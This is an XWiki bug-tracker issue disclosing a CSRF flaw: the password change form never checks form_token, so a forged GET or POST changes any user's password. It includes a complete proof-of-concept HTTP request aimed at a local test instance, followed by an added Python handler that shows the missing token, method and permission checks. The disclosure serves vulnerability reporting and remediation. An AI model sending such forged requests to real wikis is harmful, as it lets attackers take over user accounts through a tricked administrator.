XWiki Platform / XWIKI-18315

No CSRF protection on the password change form


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 1.3 M2
    • Fix Version/s: 12.10.5, 13.2-rc-1
    • Component/s: None
    • Difficulty:
      Easy
    • Documentation:
      N/A
    • Documentation in Release Notes:
      N/A

      Description

      There is no protection against CSRF-type attacks on the password change form. The form_token parameter is not checked on the server side: a request can be sent without this parameter and the password is still changed.

      It is therefore very easy, provided an administrator can be tricked into issuing the request, to change the password of any user of the wiki.

      Here is an example of a request that changes a password (user toto) on the current stable version of XWiki (both POST and GET methods work):


      GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
      Host: 127.0.0.1:8080
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Origin: http://127.0.0.1:8080
      Connection: close
      Referer: http://127.0.0.1:8080/xwiki/bin/view/XWiki/toto?xpage=passwd
      Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"
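      As an added example, not XWiki's own code: a minimal Python handler for the passwd form that performs the server-side check this report says is missing (reject a missing or mismatched form_token before touching the password) and also refuses GET for a state-changing action. Session, Request, handle_passwd and the in-memory users dict are hypothetical names; the only XWiki-specific values are the parameter names from the request above.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs

@dataclass
class Session:
    """Hypothetical server-side session; the CSRF token lives here, not in the URL."""
    user: str
    is_admin: bool = False
    form_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))

@dataclass
class Request:
    """Hypothetical request: method plus the raw query string or form body."""
    method: str
    query: str
    session: Session

def handle_passwd(req: Request, target: str, users: dict) -> tuple:
    """Change `target`'s password only when every check passes.

    Returns an (HTTP status, message) pair; `users` is an in-memory store
    standing in for the wiki's user documents.
    """
    params = {k: v[0] for k, v in parse_qs(req.query).items()}
    # 1. A state-changing action must not be reachable via GET.
    if req.method != "POST":
        return 405, "method not allowed"
    # 2. The reported bug: form_token was never checked. Reject when absent...
    token = params.get("form_token")
    if token is None:
        return 403, "missing form_token"
    # 3. ...and compare in constant time against the token bound to the session.
    if not hmac.compare_digest(token.encode(), req.session.form_token.encode()):
        return 403, "invalid form_token"
    # 4. Only the user themself or an administrator may change this password.
    if req.session.user != target and not req.session.is_admin:
        return 403, "not allowed to change this password"
    # 5. The form's own validation: both fields present and identical.
    pw1, pw2 = params.get("xwikipassword"), params.get("xwikipassword2")
    if not pw1 or pw1 != pw2:
        return 400, "passwords missing or do not match"
    users[target] = pw1
    return 200, "password changed"
```

      The forged request from the report (no form_token, sent as GET) is stopped at step 1, and the same parameters sent as POST are stopped at step 2, before any password is written.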


              People

              Assignee:
              surli Simon Urli
              Reporter:
              Ventresca Pierrick Vuillemin
              Votes:
              0
              Watchers:
              2
